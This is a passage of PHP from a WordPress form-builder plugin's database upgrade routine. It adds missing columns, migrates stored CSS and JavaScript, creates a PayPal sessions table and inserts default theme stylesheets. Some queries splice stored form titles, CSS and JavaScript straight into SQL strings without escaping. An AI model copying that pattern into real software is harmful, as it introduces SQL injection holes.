        if ($prop['Field'] == 'submit_text')
          $exists_submit_text = 1;
        if ($prop['Field'] == 'url')
          $exists_url = 1;
        if ($prop['Field'] == 'submit_text_type')
          $exists_submit_text_type = 1;
        if ($prop['Field'] == 'script_user1')
          $exists_script_user1 = 1;
        if ($prop['Field'] == 'script_user2')
          $exists_script_user2 = 1;
        if ($prop['Field'] == 'pagination')
          $exists_pagination = 1;
        if ($prop['Field'] == 'show_title')
          $exists_show_title = 1;
        if ($prop['Field'] == 'show_numbers')
          $exists_show_numbers = 1;
        if ($prop['Field'] == 'public_key')
          $exists_public_key = 1;
        if ($prop['Field'] == 'private_key')
          $exists_private_key = 1;
        if ($prop['Field'] == 'recaptcha_theme')
          $exists_recaptcha_theme = 1;
        if ($prop['Field'] == 'css')
          $exists_css = 1;
      }
      if (!$exists_form_front) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `form_front` longtext NOT NULL AFTER `form`");
      }
      if (!$exists_theme) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `theme` int(11) NOT NULL AFTER `form_front`");
      }
      if (!$exists_submit_text) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `submit_text` longtext NOT NULL AFTER `javascript`");
      }
      if (!$exists_url) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `url` varchar(200) NOT NULL AFTER `submit_text`");
      }
      if (!$exists_submit_text_type) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `submit_text_type` tinyint(4) NOT NULL AFTER `url`");
      }
      if (!$exists_script_user1) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `script_user1` text  NOT NULL AFTER `script2`");
      }
      if (!$exists_script_user2) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `script_user2` text  NOT NULL AFTER `script_user1`");
      }
      if (!$exists_pagination) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `pagination` varchar(128) NOT NULL AFTER `article_id`");
      }
      if (!$exists_show_title) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `show_title` varchar(128) NOT NULL AFTER `pagination`");
      }
      if (!$exists_show_numbers) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `show_numbers` varchar(128) NOT NULL AFTER `show_title`");
      }
      if (!$exists_public_key) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `public_key` varchar(50) NOT NULL AFTER `show_numbers`");
      }
      if (!$exists_private_key) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `private_key` varchar(50) NOT NULL AFTER `public_key`");
      }
      if (!$exists_recaptcha_theme) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `recaptcha_theme` varchar(20) NOT NULL AFTER `private_key`");
      }
      $wpdb->query("ALTER TABLE  `" . $wpdb->prefix . "formmaker` CHANGE  `article_id`  `article_id` VARCHAR(512) NOT NULL");

      $wpdb->query($form_maker_theme_table);
      $wpdb->query($form_maker_views_table);
      if ($form_maker_theme_rows)
        $wpdb->query($form_maker_theme_rows);
      $query = "SELECT id FROM " . $wpdb->prefix . "formmaker";
      $ids = $wpdb->get_col($query);
      foreach ($ids as $id) {
        $save_or_no = TRUE;
        $query = "SELECT * FROM " . $wpdb->prefix . "formmaker_views WHERE form_id=" . $id;
        $isset_form_viev = $wpdb->get_row($query);
        if (!$isset_form_viev->form_id) {
          $save_or_no = $wpdb->insert($wpdb->prefix . 'formmaker_views', array(
              'form_id' => $id,
              'views' => 0
            ), array(
              '%d',
              '%d'
            ));
        }
        if (!$save_or_no) {
          die('Database Update Error Line 147');
        }
      }
      $query = "SELECT * FROM " . $wpdb->prefix . "formmaker";
      $forms = $wpdb->get_results($query);
      foreach ($forms as $form) {
        if (strpos($form->form, "wdform_table1") === FALSE) {
          if ($form->css) {
            $new_css = str_replace('.form_view', '.wdform_table1', $form->css . "
.captcha_refresh
{
width:30px !important;
height:30px !important;
border-width:0px !important;
margin: 0px !important;
padding: 0px !important;
vertical-align:middle !important;
cursor:pointer !important;
background-image: url([SITE_ROOT]/images/refresh_black.png);
}

.wdform_table1 table,.wdform_table1 tr,.wdform_table1 td
{
border:0px !important;
padding:3px !important;
}
");
            $query = "INSERT INTO `" . $wpdb->prefix . "formmaker_themes` (`title`, `css`, `default`) VALUES('Style for " . $form->title . "', '" . $new_css . "', 0)";
            $xxxx = $wpdb->query($query);
            if (!$xxxx)
              return FALSE;
            $theme_id = $wpdb->get_var("SELECT MAX(id) FROM `" . $wpdb->prefix . "formmaker_themes`");
            $updates = " `theme`=" . $theme_id;
          }
          if ($form->article_id) {
            $updates = $updates . ', `submit_text_type`=2';
            $updates = $updates . ', `article_id`=\'' . get_permalink($form->article_id) . "'";
          }
          $updates = $updates . ", `pagination`='none'";
          $updates = $updates . ", `show_title`='false'";
          $updates = $updates . ", `show_numbers`='true'";
          $updates = $updates . ", `javascript`='" . $form->javascript . "
// before form is load
function before_load()
{

}

// before form submit
function before_submit()
{

}

// before form reset
function before_reset()
{

}' ";
          $query = "UPDATE " . $wpdb->prefix . "formmaker SET " . $updates . " WHERE id = " . $form->id;
          $form_update = $wpdb->query($query);
        }
      }
      if ($exists_css) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker DROP `css` ");
      }
      if (!get_site_option('formmaker_cureent_version')) {
        if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker_themes'") == $wpdb->prefix . "formmaker_themes")
          add_option('formmaker_cureent_version', '1.35');
      }
      else {
        if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker_themes'") == $wpdb->prefix . "formmaker_themes")
          update_option('formmaker_cureent_version', '1.35');
      }
    }
  }
  
    if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker'") == $wpdb->prefix . "formmaker") {
      $form_properties = $wpdb->get_results("DESCRIBE " . $wpdb->prefix . "formmaker", ARRAY_A);
      foreach ($form_properties as $prop) {
        $exists_paypal_mode = (($prop['Field'] == 'paypal_mode') ? 1 : 0);
        $exists_checkout_mode = (($prop['Field'] == 'checkout_mode') ? 1 : 0);
        $exists_paypal_email = (($prop['Field'] == 'paypal_email') ? 1 : 0);
        $exists_payment_currency = (($prop['Field'] == 'payment_currency') ? 1 : 0);
        $exists_tax = (($prop['Field'] == 'tax') ? 1 : 0);
        $exists_script_mail = (($prop['Field'] == 'script_mail') ? 1 : 0);
        $exists_script_mail_user = (($prop['Field'] == 'script_mail_user') ? 1 : 0);
        $exists_label_order_current = (($prop['Field'] == 'label_order_current') ? 1 : 0);
      }
      if (!$exists_paypal_mode) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `paypal_mode` int(11) NOT NULL AFTER `recaptcha_theme`");
      }
      if (!$exists_checkout_mode) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `checkout_mode` varchar(20) NOT NULL AFTER `recaptcha_theme`");
      }
      if (!$exists_paypal_email) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `paypal_email` varchar(128) NOT NULL AFTER `recaptcha_theme`");
      }
      if (!$exists_payment_currency) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `payment_currency` varchar(20) NOT NULL AFTER `recaptcha_theme`");
      }
      if (!$exists_tax) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `tax` int(11) NOT NULL AFTER `recaptcha_theme`");
      }
      if (!$exists_script_mail) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `script_mail` text NOT NULL AFTER `recaptcha_theme`");
      }
      if (!$exists_script_mail_user) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `script_mail_user` text NOT NULL AFTER `recaptcha_theme`");
      }
      if (!$exists_label_order_current) {
        $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `label_order_current` text NOT NULL AFTER `recaptcha_theme`");
      }
    }
    $form_maker_sessions_table = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_sessions` (
      `id` int(11) NOT NULL AUTO_INCREMENT,
      `form_id` int(11) NOT NULL,
      `group_id` int(11) NOT NULL,
      `ip` varchar(20) NOT NULL,
      `ord_date` varchar(20) NOT NULL,
      `ord_last_modified` varchar(20) NOT NULL,
      `status` varchar(50) NOT NULL,
      `full_name` varchar(256) NOT NULL,
      `email` varchar(256) NOT NULL,
      `phone` varchar(50) NOT NULL,
      `mobile_phone` varchar(255) NOT NULL,
      `fax` varchar(255) NOT NULL,
      `address` varchar(300) NOT NULL,
      `paypal_info` text NOT NULL,
      `without_paypal_info` text NOT NULL,
      `ipn` varchar(20) NOT NULL,
      `checkout_method` varchar(20) NOT NULL,
      `tax` varchar(50) NOT NULL,
      `shipping` varchar(50) NOT NULL,
      `shipping_type` varchar(200) NOT NULL,
      `read` int(11) NOT NULL,
      `total` varchar(200) NOT NULL,
      `currency` varchar(24) NOT NULL,
      PRIMARY KEY (`id`)
    ) DEFAULT CHARSET=utf8 AUTO_INCREMENT=17";
    $wpdb->query($form_maker_sessions_table);
    if (!get_site_option('formmaker_cureent_version')) {
      // if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker_themes'") == $wpdb->prefix . "formmaker_themes")
        add_option('formmaker_cureent_version', '2.4.3');
    }
    else {
      // if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker_themes'") == $wpdb->prefix . "formmaker_themes")
        update_option('formmaker_cureent_version', '2.4.3');
    }
  }
  $form_properties = $wpdb->get_results("DESCRIBE " . $wpdb->prefix . "formmaker", ARRAY_A);
  $exist_from_mail = 0;
  $exist_from_name = 0;
  foreach ($form_properties as $prop) {
    if ($prop['Field'] == 'from_mail') {
      $exist_from_mail = 1;
      break;
    }
  }
  foreach ($form_properties as $prop) {
    if ($prop['Field'] == 'from_name') {
      $exist_from_name = 1;
      break;
    }
  }
  if (!$exist_from_mail) {
    $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `from_mail` varchar(255) NOT NULL AFTER `recaptcha_theme`");
  }
  if (!$exist_from_name) {
    $wpdb->query("ALTER TABLE " . $wpdb->prefix . "formmaker ADD `from_name` varchar(255) NOT NULL AFTER `recaptcha_theme`");
  }
  $form_rows = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "formmaker");
  foreach ($form_rows as $form_row) {
    $wpdb->update($wpdb->prefix . "formmaker", array(
      'paypal_mode' => (($form_row->paypal_mode == '') ? 0 : $form_row->paypal_mode),
      'checkout_mode' => (($form_row->checkout_mode == '') ? 'testmode' : $form_row->checkout_mode),
      'tax' => (($form_row->tax == '') ? 0 : $form_row->tax),
      'script_mail' => (($form_row->script_mail == '') ? $form_row->script1 . '%all%' . $form_row->script2 : $form_row->script_mail),
      'script_mail_user' => (($form_row->script_mail_user == '') ? $form_row->script_user1 . '%all%' . $form_row->script_user2 : $form_row->script_mail_user),
      'label_order_current' => $form_row->label_order,
    ), array(
      'id' => $form_row->id,
    ), array(
      '%d',
      '%s',
      '%d',
      '%s',
      '%s',
      '%s',
    ), array(
      '%d',
    ));
  }

  $theme_ids = $wpdb->query("SELECT id FROM " . $wpdb->prefix . "formmaker_themes WHERE `css` LIKE '%wdform_grading%'");
  if (!$theme_ids) {
    $themes = array(
      "1" => ".wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.wdform_table1 tr, td\r\n{\r\nborder: 0px solid black;\r\n}\n.wdform_table1 input:focus\r\n{\r\nborder:1px solid;\r\n}\n.wdform_table2 tr, td\r\n{\r\nborder:0px;\r\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:left;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important;\n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:transparent !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:21px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:17px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_colon\n{\ncolor:#000 !important;\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nheight:17px !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\nfont-weight: bold;\r\nfont-size:12px;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\nfont-weight: bold;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:17px !important;\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000 !important;\n}\n.page_deactive\n{\ncolor:#000 !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:transparent !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#000000; !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#D3D3D3 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-color:#000000; !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000; !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000; !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000; !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000; !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\npadding: 5px !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}\r\n\r\n.wdform_footer\r\n{\r\nmargin:10px;\r\ndisplay: table;\r\nwidth: 90%;\r\n}\r\n\r\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating div span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\nborder-radius:4px;\r\nborder:1px solid #000000;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#000000 !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#000000;\r\n}\r\n\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #000000;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#000000;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #000000;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground-color:#FFFFFF;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #000000;\r\nborder-radius:4px !important;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\nborder-radius:4px;\r\nmargin: 2px 5px 3px 0 !important;\r\nborder:1px solid #000000;\r\n}\r\n\r\n.wdform_matrix table select\r\n{\r\nborder-radius:4px;\r\nmargin:5px 7px;\r\nborder:1px solid #000;\r\npadding:1px;\r\n}\r\n\r\n.wdform_matrix table input:focus\r\n{\r\noutline:none;\r\nborder: 1px solid #000000;\r\n}\r\n\r\n.wdform_matrix table select:focus\r\n{\r\noutline:none;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\nfont-weight:bold;\r\n}",
      "2" => ".wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n.wdform_table1 button\n{\n	background-image:none !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:left;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#333333 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder-width: 1px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:22px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder-width: 1px !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder-width:1px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #ffffff !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#ffffff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#333 !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#84857D !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000000 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:1px solid black !important;\nbackground-color:#84857D !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white 